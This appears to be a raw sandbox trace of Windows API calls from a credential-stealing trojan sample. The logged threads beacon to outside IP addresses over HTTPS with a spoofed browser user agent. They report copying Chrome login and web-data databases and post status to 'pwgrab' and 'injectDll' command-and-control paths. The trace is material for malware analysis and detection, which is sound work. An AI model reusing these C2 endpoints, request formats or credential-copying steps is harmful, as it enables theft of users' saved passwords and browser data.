	[0256.610] lstrcmpiW (lpString1="Log", lpString2="DINJ") returned 1
	[0256.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0256.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bff68, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xf58) returned 0x668
	[0256.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6958
	[0256.610] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0256.610] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0256.610] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0256.610] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c6958) returned 1

Thread:
	id = 153
	os_tid = 0x230


Thread:
	id = 154
	os_tid = 0x93c


Thread:
	id = 166
	os_tid = 0x51c


Thread:
	id = 169
	os_tid = 0xa38

	[0188.463] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4dc0
	[0188.463] WinHttpConnect (hSession=0x22c4dc0, pswzServerName="51.77.92.215", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c4ea8
	[0188.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2634d8
	[0188.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Build date: Apr 30 2019 18:51:16\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35
	[0188.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0188.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Build date: Apr 30 2019 18:51:16\r\n", cchWideChar=-1, lpMultiByteStr=0x22a6490, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Build date: Apr 30 2019 18:51:16\r\n", lpUsedDefaultChar=0x0) returned 35
	[0188.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a62d0
	[0188.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff270
	[0188.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff288
	[0188.464] GetTickCount () returned 0xa86470
	[0188.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0188.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x26e658
	[0188.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x268eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0188.464] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0188.464] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/VERS/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22bb5e0
	[0188.464] WinHttpSetOption (hInternet=0x22bb5e0, dwOption=0x1f, lpBuffer=0x268f228, dwBufferLength=0x4) returned 1
	[0188.464] WinHttpSendRequest (hRequest=0x22bb5e0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB0CF0\r\nContent-Length: 139\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x26e658*, dwOptionalLength=0x8b, dwTotalLength=0x8b, dwContext=0x0) returned 1
	[0190.093] WinHttpReceiveResponse (hRequest=0x22bb5e0, lpReserved=0x0) returned 1
	[0190.094] WinHttpQueryHeaders (in: hRequest=0x22bb5e0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f218, lpdwBufferLength=0x268f214, lpdwIndex=0x0 | out: lpBuffer=0x268f218*, lpdwBufferLength=0x268f214*=0x4, lpdwIndex=0x0) returned 1
	[0190.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a62d0) returned 1
	[0190.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff270) returned 1
	[0190.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff288) returned 1
	[0190.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0190.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0190.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e658) returned 1
	[0190.094] Sleep (dwMilliseconds=0xbb8) 
	[0193.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263460) returned 1
	[0193.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0193.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22aa438) returned 1
	[0193.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263438) returned 1
	[0193.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0193.956] WinHttpCloseHandle (hInternet=0x22bb5e0) returned 1
	[0193.956] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0193.956] WinHttpCloseHandle (hInternet=0x22c4dc0) returned 1
	[0193.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2634d8) returned 1

Thread:
	id = 172
	os_tid = 0x738

	[0188.620] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5078
	[0188.621] WinHttpConnect (hSession=0x22c5078, pswzServerName="51.77.92.215", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5160
	[0188.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263780
	[0188.621] WinHttpSetTimeouts (hInternet=0x22c5078, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0188.621] WinHttpOpenRequest (hConnect=0x22c5160, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0188.621] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x298f234, dwBufferLength=0x4) returned 1
	[0188.621] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0189.083] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0189.083] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x298f224, lpdwBufferLength=0x298f220, lpdwIndex=0x0 | out: lpBuffer=0x298f224*, lpdwBufferLength=0x298f220*=0x4, lpdwIndex=0x0) returned 1
	[0189.083] Sleep (dwMilliseconds=0xbb8) 
	[0192.525] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263690) returned 1
	[0192.525] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff378) returned 1
	[0192.525] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263640) returned 1
	[0192.525] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2636e0) returned 1
	[0192.525] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0192.525] WinHttpCloseHandle (hInternet=0x22c5160) returned 1
	[0192.525] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0192.525] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263780) returned 1

Thread:
	id = 218
	os_tid = 0x510

	[0201.078] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4dc0
	[0201.079] WinHttpConnect (hSession=0x22c4dc0, pswzServerName="51.77.92.215", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c4ea8
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26933a0
	[0201.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome login db should be copied (copy absent)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6228
	[0201.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome login db should be copied (copy absent)", cchWideChar=-1, lpMultiByteStr=0x22a6228, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chrome login db should be copied (copy absent)", lpUsedDefaultChar=0x0) returned 47
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a62d0
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0a8
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff5d0
	[0201.110] GetTickCount () returned 0xa89243
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311210
	[0201.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa0) returned 0x22d2170
	[0201.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x268eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0201.110] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0201.111] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0201.111] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x268f228, dwBufferLength=0x4) returned 1
	[0201.111] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB3AC3\r\nContent-Length: 151\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x22d2170*, dwOptionalLength=0x97, dwTotalLength=0x97, dwContext=0x0) returned 1
	[0201.376] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0201.376] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f218, lpdwBufferLength=0x268f214, lpdwIndex=0x0 | out: lpBuffer=0x268f218*, lpdwBufferLength=0x268f214*=0x4, lpdwIndex=0x0) returned 1
	[0201.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a62d0) returned 1
	[0201.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0a8) returned 1
	[0201.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff5d0) returned 1
	[0201.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6228) returned 1
	[0201.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311210) returned 1
	[0201.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d2170) returned 1
	[0201.376] Sleep (dwMilliseconds=0xbb8) 
	[0204.423] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2692e78) returned 1
	[0204.423] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0204.423] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22620e8) returned 1
	[0204.423] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2306618) returned 1
	[0204.423] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2306578) returned 1
	[0204.423] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0204.424] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0204.424] WinHttpCloseHandle (hInternet=0x22c4dc0) returned 1
	[0204.424] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26933a0) returned 1

Thread:
	id = 219
	os_tid = 0xc18

	[0204.075] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5160
	[0204.076] WinHttpConnect (hSession=0x22c5160, pswzServerName="51.77.92.215", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5248
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb860
	[0204.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome login db copied", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb888
	[0204.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome login db copied", cchWideChar=-1, lpMultiByteStr=0x26cb888, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chrome login db copied", lpUsedDefaultChar=0x0) returned 23
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb8b0
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff8b8
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff8d0
	[0204.077] GetTickCount () returned 0xa89dd7
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311210
	[0204.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225390
	[0204.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2d8eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0204.077] WinHttpSetTimeouts (hInternet=0x22c5160, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0204.077] WinHttpOpenRequest (hConnect=0x22c5248, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26e438
	[0204.077] WinHttpSetOption (hInternet=0x26e438, dwOption=0x1f, lpBuffer=0x2d8f228, dwBufferLength=0x4) returned 1
	[0204.077] WinHttpSendRequest (hRequest=0x26e438, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB4657\r\nContent-Length: 127\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x225390*, dwOptionalLength=0x7f, dwTotalLength=0x7f, dwContext=0x0) returned 1
	[0204.456] WinHttpReceiveResponse (hRequest=0x26e438, lpReserved=0x0) returned 1
	[0204.456] WinHttpQueryHeaders (in: hRequest=0x26e438, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f218, lpdwBufferLength=0x2d8f214, lpdwIndex=0x0 | out: lpBuffer=0x2d8f218*, lpdwBufferLength=0x2d8f214*=0x4, lpdwIndex=0x0) returned 1
	[0204.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb8b0) returned 1
	[0204.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff8b8) returned 1
	[0204.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff8d0) returned 1
	[0204.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb888) returned 1
	[0204.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311210) returned 1
	[0204.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225390) returned 1
	[0204.456] Sleep (dwMilliseconds=0xbb8) 
	[0208.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb798) returned 1
	[0208.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff858) returned 1
	[0208.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6228) returned 1
	[0208.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb770) returned 1
	[0208.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb748) returned 1
	[0208.261] WinHttpCloseHandle (hInternet=0x26e438) returned 1
	[0208.261] WinHttpCloseHandle (hInternet=0x22c5248) returned 1
	[0208.261] WinHttpCloseHandle (hInternet=0x22c5160) returned 1
	[0208.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb860) returned 1

Thread:
	id = 223
	os_tid = 0x308

	[0207.423] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5078
	[0207.423] WinHttpConnect (hSession=0x22c5078, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c4ea8
	[0207.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbcc0
	[0207.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome webdata db should be copied (copy absent)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49
	[0207.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7278
	[0207.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome webdata db should be copied (copy absent)", cchWideChar=-1, lpMultiByteStr=0x22c7278, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chrome webdata db should be copied (copy absent)", lpUsedDefaultChar=0x0) returned 49
	[0207.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0207.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff990
	[0207.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff978
	[0207.424] GetTickCount () returned 0xa8aa26
	[0207.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311318
	[0207.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa0) returned 0x22d22c0
	[0207.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x268eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0207.424] WinHttpSetTimeouts (hInternet=0x22c5078, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0207.424] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0207.424] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x268f228, dwBufferLength=0x4) returned 1
	[0207.424] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB52A6\r\nContent-Length: 153\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x22d22c0*, dwOptionalLength=0x99, dwTotalLength=0x99, dwContext=0x0) returned 1
	[0208.305] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0208.305] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f218, lpdwBufferLength=0x268f214, lpdwIndex=0x0 | out: lpBuffer=0x268f218*, lpdwBufferLength=0x268f214*=0x4, lpdwIndex=0x0) returned 1
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff990) returned 1
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff978) returned 1
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7278) returned 1
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311318) returned 1
	[0208.305] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d22c0) returned 1
	[0208.305] Sleep (dwMilliseconds=0xbb8) 
	[0211.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbae0) returned 1
	[0211.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff5d0) returned 1
	[0211.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7eb8) returned 1
	[0211.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cba90) returned 1
	[0211.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbb30) returned 1
	[0211.651] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0211.651] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0211.651] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0211.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbcc0) returned 1

Thread:
	id = 224
	os_tid = 0x20c

	[0207.425] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5330
	[0207.425] WinHttpConnect (hSession=0x22c5330, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5418
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbf90
	[0207.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome webdata db copied", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbfb8
	[0207.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chrome webdata db copied", cchWideChar=-1, lpMultiByteStr=0x26cbfb8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chrome webdata db copied", lpUsedDefaultChar=0x0) returned 25
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbfe0
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa80
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa98
	[0207.425] GetTickCount () returned 0xa8aa26
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0207.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x22c34e8
	[0207.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2edeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0207.425] WinHttpSetTimeouts (hInternet=0x22c5330, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0207.425] WinHttpOpenRequest (hConnect=0x22c5418, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DEBG/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26cdc48
	[0207.426] WinHttpSetOption (hInternet=0x26cdc48, dwOption=0x1f, lpBuffer=0x2edf228, dwBufferLength=0x4) returned 1
	[0207.426] WinHttpSendRequest (hRequest=0x26cdc48, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB52A6\r\nContent-Length: 129\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x22c34e8*, dwOptionalLength=0x81, dwTotalLength=0x81, dwContext=0x0) returned 1
	[0208.327] WinHttpReceiveResponse (hRequest=0x26cdc48, lpReserved=0x0) returned 1
	[0208.327] WinHttpQueryHeaders (in: hRequest=0x26cdc48, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf218, lpdwBufferLength=0x2edf214, lpdwIndex=0x0 | out: lpBuffer=0x2edf218*, lpdwBufferLength=0x2edf214*=0x4, lpdwIndex=0x0) returned 1
	[0208.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbfe0) returned 1
	[0208.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa80) returned 1
	[0208.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa98) returned 1
	[0208.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbfb8) returned 1
	[0208.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0208.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c34e8) returned 1
	[0208.327] Sleep (dwMilliseconds=0xbb8) 
